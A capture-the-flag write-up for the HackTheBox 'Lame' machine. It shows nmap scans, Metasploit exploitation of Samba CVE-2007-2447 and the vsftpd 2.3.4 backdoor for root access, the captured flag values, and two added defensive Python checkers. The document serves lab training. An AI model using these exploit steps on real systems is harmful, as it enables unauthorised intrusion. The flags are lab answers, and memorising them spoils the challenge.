
HTB:Lame[WriteUP]

Date: 2024-10-13 18:21:02  Views: 14
Tags: HTB Lame nmap WriteUP makis VSFTPd IP target machine root


Connect to the HTB server and start the target machine

Target IP: 10.10.10.3

Assigned (attacker) IP: 10.10.16.7


1.How many of the nmap top 1000 TCP ports are open on the remote host?

Scan the first 1000 ports of the target with nmap (note that `-p1-1000` scans ports 1 through 1000, which is not the same set as nmap's default top-1000 list used when no `-p` is given):

nmap -p1-1000 -T4 --min-rate=1000 -sS {TARGET_IP}

The scan shows four open ports on the target: 21, 22, 139 and 445.


2.What version of VSFTPd is running on Lame?

Run nmap's default scripts and service/version detection against port 21 of the target:

nmap -p 21 -sC -sV {TARGET_IP}

In the VERSION column of the scan output, vsftpd is reported as version 2.3.4.


3.There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here?

Start Metasploit:

msfconsole

Search for modules related to VSFTPd 2.3.4:

search vsftpd 2.3.4

Select the exploit module:

use exploit/unix/ftp/vsftpd_234_backdoor

Show the options that can be set:

show options

Set the target IP in the RHOSTS option:

set rhosts {TARGET_IP}

Attempt the exploit:

exploit

The exploit fails (answer: no); it asks for a user password to be specified.


4.What version of Samba is running on Lame? Give the numbers up to but not including "-Debian".

Run nmap's default scripts and service/version detection against ports 139 and 445 of the target:

nmap -p 139,445 -sC -sV {TARGET_IP}

The scan shows the target's Samba server version as 3.0.20.


5.What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword function when the "username map script" option is enabled in smb.conf?

A Google search for this vulnerability gives: CVE-2007-2447
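Since the CVE only applies when `username map script` is set in smb.conf, a defender's first check is the configuration itself. The following is an added example, not code from the writeup: a small smb.conf auditor that flags the `username map script` directive in `[global]` and, as a bonus, any share that is both writable and guest-accessible (like the tmp share found later on Lame). The sample configuration embedded in it is constructed for illustration and is not Lame's real smb.conf.

```python
"""Audit an smb.conf for the precondition of CVE-2007-2447 (Samba 3.0.0 - 3.0.25rc3):
the 'username map script' directive in [global]. Also flags writable guest shares.
Added example; the sample config below is constructed, not taken from Lame."""
import re
from typing import Dict, List

# Constructed sample smb.conf (assumption: typical Debian/Ubuntu layout).
SAMPLE_SMB_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = %h server (Samba, Ubuntu)
   username map script = /etc/samba/scripts/mapusers.sh
   security = user

[tmp]
   path = /tmp
   read only = no
   guest ok = yes

[opt]
   path = /opt
   read only = yes
"""


def parse_smb_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Parse smb.conf into {section: {normalised key: value}}.
    Keys are lower-cased with whitespace runs collapsed, because Samba treats
    'username map script' and 'Username  Map Script' as the same parameter."""
    sections: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":          # skip blanks and comments
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:                                     # new [section]
            current = m.group(1).strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:    # stray line outside a section
            continue
        key, value = line.split("=", 1)
        norm_key = re.sub(r"\s+", " ", key.strip().lower())
        sections[current][norm_key] = value.strip()
    return sections


def _truthy(value: str) -> bool:
    return value.strip().lower() in ("yes", "true", "1")


def audit_smb_conf(text: str) -> List[str]:
    """Return a list of findings; an empty list means nothing was flagged."""
    findings: List[str] = []
    conf = parse_smb_conf(text)
    script = conf.get("global", {}).get("username map script")
    if script:
        findings.append(
            f"[global] sets 'username map script = {script}'; on Samba 3.0.0-3.0.25rc3 "
            "this enables CVE-2007-2447 (command injection via SamrChangePassword). "
            "Remove the directive or upgrade Samba."
        )
    for name, opts in conf.items():
        if name == "global":
            continue
        # Samba accepts 'read only', 'writable' and 'writeable' as synonyms.
        writable = (not _truthy(opts.get("read only", "yes"))
                    or _truthy(opts.get("writable", "no"))
                    or _truthy(opts.get("writeable", "no")))
        if writable and _truthy(opts.get("guest ok", "no")):
            findings.append(f"share [{name}] is writable and allows guest access")
    return findings


if __name__ == "__main__":
    for finding in audit_smb_conf(SAMPLE_SMB_CONF):
        print("FINDING:", finding)
```

On a real host, read `/etc/samba/smb.conf` into `audit_smb_conf` instead of the constructed sample; `testparm -s` output also parses the same way and shows the effective configuration after includes.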


6.Exploiting CVE-2007-2447 returns a shell as which user?

Connect to the target's Samba server and list all shares (press Enter for an empty password):

smbclient -L {TARGET_IP}

Use smbmap to check the permissions on each share:

smbmap -H {TARGET_IP}

The smbmap output shows that only the tmp share is readable and writable.

List all files in the tmp share

There are no files with sensitive information, so the only route left is the Samba server version, 3.0.20.

In msfconsole, check whether samba 3.0.20 has a known exploit:

Select the module:

use exploit/multi/samba/usermap_script

View the module's configuration parameters:

show options

Set the target IP in RHOSTS:

set rhosts {TARGET_IP}

Set the local (attacker) IP in LHOST:

set lhost {NATIVE_IP}

Run the exploit:

exploit

The current user is: root


7.Submit the flag located in the makis user's home directory.

Find the path of the makis directory:

find / -name 'makis' 2>/dev/null

Change into that directory:

cd /home/makis

List the files in the directory:

ls

View the contents of user.txt:

cat user.txt

USER_FLAG:f249448c9d70f706133439ab6b4e18ce


8.Submit the flag located in root's home directory.

Locate root.txt directly and print its contents:

cat `find / -name 'root.txt' 2>/dev/null`

ROOT_FLAG:01a51cb525aa507c6e1f7745bc85ab97


9.We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap scan showed four open TCP ports. Running netstat -tnlp shows many more ports listening, including ones on 0.0.0.0 and the box's external IP, so they should be accessible. What must be blocking connection to these ports?

Use the script command to upgrade to an interactive shell:

script /dev/null -c bash

View the listening sockets on the target:

netstat -tnlp

Port 21 is listening locally on the target, but the exploit traffic is blocked by a firewall (answer: firewall).

To exploit this vulnerability, therefore, only a user already on the local network environment can use it for privilege escalation.
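The reasoning in this section (sockets bound to 0.0.0.0 or the external IP that an outside scan nevertheless cannot see must be filtered by a host firewall) is a useful audit check in its own right. The following is an added example, not part of the writeup: it parses `netstat -tnlp` output, drops loopback-only listeners, and reports every externally bound port that an external scan did not see as open. The netstat lines and the external scan result embedded below are constructed sample data, not real output from Lame.

```python
"""Cross-check local TCP listeners against externally visible open ports to
find host-firewall filtering. Added example; the netstat output and the
externally-open port set below are constructed, not captured from Lame."""
import re
from typing import Dict, List, Set

# Constructed sample of `netstat -tnlp` output (assumption: Linux net-tools format).
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      4325/vsftpd
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      4411/sshd
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      4620/smbd
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      4620/smbd
tcp        0      0 0.0.0.0:3632            0.0.0.0:*               LISTEN      4502/distccd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      4389/mysqld
tcp        0      0 10.10.10.3:5432         0.0.0.0:*               LISTEN      4456/postgres
tcp6       0      0 :::22                   :::*                    LISTEN      4411/sshd
"""

# Constructed: the ports an external nmap scan reported as open.
EXTERNALLY_OPEN: Set[int] = {21, 22, 139, 445}

# Matches: proto recv-q send-q local:port foreign STATE pid/prog
NETSTAT_RE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+)\s+\S+\s+LISTEN\s+(\S+)")


def parse_listeners(netstat_output: str) -> Dict[int, Dict[str, str]]:
    """Map port -> {'addr': bind address, 'proc': PID/program} for TCP LISTEN sockets.
    If a port is bound on both IPv4 and IPv6, the first (IPv4) entry is kept."""
    listeners: Dict[int, Dict[str, str]] = {}
    for line in netstat_output.splitlines():
        m = NETSTAT_RE.match(line)
        if m:
            addr, port, proc = m.group(1), int(m.group(2)), m.group(3)
            listeners.setdefault(port, {"addr": addr, "proc": proc})
    return listeners


def loopback_only(addr: str) -> bool:
    """True for sockets that are never reachable from outside the host."""
    return addr.startswith("127.") or addr == "::1"


def find_filtered(netstat_output: str, externally_open: Set[int]) -> List[int]:
    """Ports bound to a non-loopback address that the external scan did not see.
    Something between the scanner and the socket (typically a host firewall such
    as iptables) must be dropping those connections."""
    listeners = parse_listeners(netstat_output)
    return sorted(port for port, info in listeners.items()
                  if not loopback_only(info["addr"]) and port not in externally_open)


def report(netstat_output: str, externally_open: Set[int]) -> str:
    """Human-readable summary, one line per filtered port."""
    listeners = parse_listeners(netstat_output)
    lines = [f"{p}/tcp bound to {listeners[p]['addr']} ({listeners[p]['proc']}) "
             "listens locally but is not reachable externally: filtered"
             for p in find_filtered(netstat_output, externally_open)]
    return "\n".join(lines) if lines else "all externally bound listeners are reachable"


if __name__ == "__main__":
    print(report(SAMPLE_NETSTAT, EXTERNALLY_OPEN))
```

In practice, feed it the real `netstat -tnlp` (or `ss -tnlp`, after adjusting the regex) from the host and the open-port set from an nmap scan run from outside; any port the function lists is a candidate for inspection with `iptables -L -n -v` on the host.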


10.When the VSFTPd backdoor is triggered, what port starts listening?

A Google search shows that triggering this backdoor calls the vsf_sysutil_extra() function, which opens port 6200 on the system.

Use searchsploit to search for an exploit for this vulnerability


11.When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?

Run the exploit script:

python2 49757.py {TARGET_IP}

To demonstrate privilege escalation, first switch from root to the makis user:

su makis -c bash

Use netcat to connect to port 6200 on the target's localhost:

nc 127.0.0.1 6200

root@lame:/# su makis -c bash
makis@lame:/$ nc 127.0.0.1 6200
(UNKNOWN) [127.0.0.1] 6200 (?) : Connection refused
makis@lame:/$ nc 127.0.0.1 6200
whoami
root

Privilege escalation to root succeeded.

From: https://blog.csdn.net/qq_43007452/article/details/142895280
